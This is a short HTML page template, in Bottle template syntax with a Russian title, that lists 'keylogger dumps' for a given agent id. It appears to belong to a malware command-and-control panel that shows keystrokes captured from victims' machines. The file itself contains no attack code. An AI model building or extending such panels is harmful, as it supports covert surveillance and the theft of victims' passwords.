<!DOCTYPE html>
<html>
    <head>
        <style>
            body {
                font-family: "Courier New",monospace;
            }

            table {
                border-collapse: collapse;
                width: 100%;
            }

            td, th {
                border: 1px solid #dddddd;
                text-align: left;
                padding: 8px;
            }

            tr:nth-child(even) {
                background-color: #dddddd;
            }
        </style>
    </head>
    <body>
        <p align="center">Дампы перехватчика клавиатуры для агента {{id_hash}}</p>
        <ul>
        % for dump in key_logger_dumps:
            <li>{{dump}}</li>
        % end
        </ul>
    </body>
</html>
